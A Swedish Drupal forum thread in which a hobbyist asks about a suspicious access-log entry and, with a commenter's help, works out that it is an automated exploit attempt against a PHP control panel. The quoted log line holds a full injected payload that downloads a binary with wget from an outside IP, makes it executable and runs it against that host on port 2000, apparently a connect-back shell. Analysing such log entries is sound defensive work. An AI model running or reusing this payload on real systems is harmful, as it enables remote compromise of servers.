Försök till "hacking"?

Events happening in the community are now at Drupal community events on www.drupal.org.
CirruZZ's picture
Posted by CirruZZ on March 16, 2008 at 8:12pm

Satt och kollade igenom loggarna på min privat Drupal sida, som för övrig snurrar på min egna Ubuntu server hemma, och då upptäckte jag något som till synes ser ut som ett försök till en attack av en hacker. Jag har nämligen en logg-post med åtkomst nekad, där Plats fältet säger...

http://[MITT_IP]/admin/business_inc/saveserver.php
?thisdir=http://82.165.40.226/cmd.gif?&cmd=cd%20/tmp;wget%2082.165.40.226/cback;
chmod%20755%20cback;./cback%2082.165.40.226%202000;echo%20YYY;echo|

(jag har delat upp texten i rader för att få plats på skärmen, men egentligen så är det en ända lång rad, tog även bort mitt faktiska IP)

Nu håller jag precis på att lära mig Linux, så jag ser ju att det är kommandon inbakade i texten, men vad skull försöket till hack kunna innebära? Är det något som har med Drupal att göra över huvudtaget, som man skall oroa sig för? Någon här som kanske besitter bättre kunskap i Linux än mig som skulle kunna våga sig på en beskrivning?

/Anders

Categories:

Comments

Verkar som någon försöker

Posted by zoo33 on March 17, 2008 at 12:02am
zoo33's picture

Verkar som någon försöker utnyttja ett säkerhetshål i någon php-applikation, dock inte Drupal. Det kommer inte påverka din Drupal-site såvida du inte är helt bombarderad med sådana anrop. Och du behöver nog inte känna dig särskilt hotad personligen, attacken är förmodligen riktad mot ungefär allt och alla...

/ Hannes Lilljequist – SthlmConnection

Det var det jag misstänkte

Posted by CirruZZ on March 17, 2008 at 8:26am
CirruZZ's picture

...men man kan ändå inte vara på säkra sidan innan man vet. Jag har gjort lite hemläxa och forskat, bland annat för att lära mig själv.

  • Sökvägen /admin/business_inc/saveserver.php verkar till höra någon sorts administrations applikation i PHP som heter Parallels Confixx Control Panel.

  • De försöker utnyttja ett säkerhetshål genom att ladda en gif-fil från en server med IP 82.165.40.226 som dom har kontroll över, eller rimligtvis borde ha i varje fall. Går man till http://82.165.40.226 så kommer man till någon sorts Confixx inloggning.

  • Till den gif-filen finns det ett antal argument som består av ett enkelt script i BASH

    • cd /tmp ställer sig i tmp katalogen
    • wget 82.165.40.226/cback försöker hämta en fil från samma server som ovan, filen är en binnär fil och borde vara något sorts program
    • chmod 755 cback ändrar rättigheter på filen så att den får köras/exekveras
    • ./cback 82.165.40.226 2000 kör filen med några argument, gissningsvis skickas information till det angivna IPt (på port 2000 kanske)
    • echo YYY;echo| några utskrifter som jag inte vet vad dom har för syfte.

Det är ungefär så långt som jag kommit!

Jag kan för övrigt nämna att tidigare så använde jag en burk med XP och XAMPP hemma för att serva min experiment sida och det var ingen bra lösning kan jag säga. Även fast jag försökte säkra upp den så var den vid öppen för hela världen, och mycket riktigt, så blev den hackand.
Hittade i FTP loggarna att någon lyckats logga in på ett konto som jag inte visste fanns och laddat upp diverse PHP filer, samt lyckats köra dom (såg det via www-access loggarna). Jag försöket ta reda på vad det kunde varit för att återsälla, men en vän till mig som jobbar inom IT-säkerhet sa, att om dom är duktiga så kan man aldrig vara helt säker på att man fått bort allt skadligt. Det var då som jag bestämde mig för att överge Windows träsket för gott, och nu sitter jag med Ubuntu istället, både på servern hemma och på min laptop! Tar ett tag innan man lärt sig tillräckligt bara för att flytta en fil, men det kommer så sakteliga, "trägen vinner"!!

Anders Olsson

Anders Olsson

Sweden

Group notifications

This group offers an RSS feed. Or subscribe to these personalized, sitewide feeds: